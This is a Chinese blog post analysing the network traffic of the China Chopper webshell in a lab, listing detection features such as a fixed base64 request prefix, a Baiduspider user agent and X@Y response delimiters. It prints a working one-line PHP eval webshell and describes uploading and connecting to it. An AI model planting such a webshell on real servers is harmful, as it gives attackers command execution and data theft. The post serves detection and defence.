菜刀webshell特征分析

简介: 菜刀webshell特征分析

前言

Webshell是hacker经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。

hacker通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。

有个想法,看看他这个工具的原理,再分析一下菜刀的特征。我用的最多的就是菜刀,蚁剑安装不上,后面有机会再分析。

环境

用的虚拟机的phpstudy搭建的网站,并在虚拟机里面使用wireshark进行捕捉流量包。

物理机使用的是中国菜刀:https://github.com/raddyfiy/caidao-official-version

上传webshell并连接

一句话木马:

<?php eval($_POST[caidao]);?>

通过某种途径,把一句话木马上传到了网站的根域名下

然后在菜刀工具里面,添加一个新的shell连接,密码caidao

同时也开启wireshark进行抓包,为了更直观的分析,对ip进行了过滤,只看与物理机(192.168.80.1) 的通信

成功连接到webshell

翻看一下目录

执行系统命令

上传了一个测试文本

分析流量

我已经将捕获到的数据包上传至csdn,详细见:https://download.csdn.net/download/weixin_52444045/86269653

特征一:

所有的请求都是一致的,方式为POST,路径为webshell的url地址。

我的是POST /123.php

特征二:

菜刀工具发起的请求头里面,默认的UA为百度的爬虫 Baiduspider

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

不过这个东西是可以在caidao.conf里面进行修改的,还是小心起见

特征三

这个是最主要的一个特征,如果请求包中包含下面信息,那么99%就是菜刀连接到shell了

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

在所有的请求包中,请求体的内容中,key的值就是连接菜刀webshell的密码,后面的值是用base64进行了加密,下面拿出几个值来进行分析下

圈出的这个可以用base64进行解码解出来的,每个请求中的前缀都是一样的,一定要注意这个前缀!!

QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7J

解码后是下面:

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");

特征四

每个返回包中,结果是用X@Y进行包含的

通过返回包可以直观的判断出是做了什么操作。

个人理解

图形操作去执行一些操作的原理是,利用php、asp、jsp的函数去完成操作。

后来找到在caidao.conf文件里面,有写每个操作的函数

下面对抓取到的一个流量包和代码进行对比

可以看到这个是上传文件的操作

可以看出规律: 执行对应操作的代码为

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");+对应操作的函数代码+;echo("X@Y");die();

然后通过base64编码,传入请求体中。所以前缀是固定的,详细见特征三。

通过分析捕获到的流量包,每一个请求包中都可以解密并找到是什么操作的

目录
相关文章
|
7月前
|
云安全 安全 网络协议
安全研究所 | 伪装搜狗输入法的木马分析
近年来,黑灰产业的犯罪团伙数量急剧上升,特别是在与办公软件相关领域。这些团伙主要针对国内企业用户,通过伪装成合法的办公软件进行精心设计的诈骗和诱导行为,其主要目的是欺骗企业员工下载并激活木马病毒,以此来窃取公司资金或获取企业敏感文件。
|
2月前
|
开发框架 Java .NET
Webshell分类
Webshell分类
74 2
|
3月前
|
安全 索引
抓到一只灰鸽子和一匹木马/广告程序
抓到一只灰鸽子和一匹木马/广告程序
|
7月前
|
安全 网络协议 Linux
陇剑杯 流量分析 webshell CTF writeup
陇剑杯 流量分析 webshell CTF writeup
|
7月前
|
安全 数据安全/隐私保护
webshell菜刀后门分析
webshell菜刀后门分析
43 1
|
7月前
|
安全 数据安全/隐私保护
webshell后门分析
webshell后门分析
107 3
|
XML 开发框架 安全
WebShell 特征分析
`WebShell`是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,常见的webshell编写语言为`asp `/`jsp`/`php`。主要用于网站管理,服务器管理,权限管理等操作。使用方法简单,只需要上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站的服务器的管理。
507 0
|
安全 数据安全/隐私保护
服务器木马如何查杀之威胁情报分析
威胁情报,顾名思义它是威胁的情报,这个情报的产出是什么,是人。也就是说通过很多人或者一些自动采集的设备,形成的一个数据报告,就是威胁情报。那威胁情报有很多的平台,这些平台可以查出域名和IP地址的信誉度,如果咱们发现IP和域名的信誉度非常低,并且存在攻击的行为,那迅速给它封禁。那举个形象点的例子,比如现在小明,那小明欠了别人几千块钱,法院把它列为被执行人,他就变成老赖了。那这个时候你坐地铁或者坐高铁是不是就不行了,IP和域名的信誉度也是一样的,你一旦被标记为攻击IP或者木马反连,这时候对于我们来说,你这个IP就没有信誉度了,我发现你这个地址,我的服务在访问你,就怀疑它是攻击,那看一下有哪些平台,
207 0
|
安全 Shell CDN
一次偶然的CobaltStrike木马钓鱼邮件分析
一次偶然的CobaltStrike木马钓鱼邮件分析
441 0
一次偶然的CobaltStrike木马钓鱼邮件分析
|
存储 安全 关系型数据库
webshell网站木马文件后门如何根据特征删除
Webshell实际上是一个能够执行恶意功能的PHP代码文件。Webshell要执行恶意功能,其代码结构主要由两部分组成:数据传递部分和数据执行部分。在webshell中,数据传递部分是指webshell中用来接收外部输入数据的部分,webshell可以根据外部输入数据动态地交互执行恶意功能。在webshell中,数据执行部分指的是webshell中的system函数,用于执行代码执行和执行命令等命令。
396 0
webshell网站木马文件后门如何根据特征删除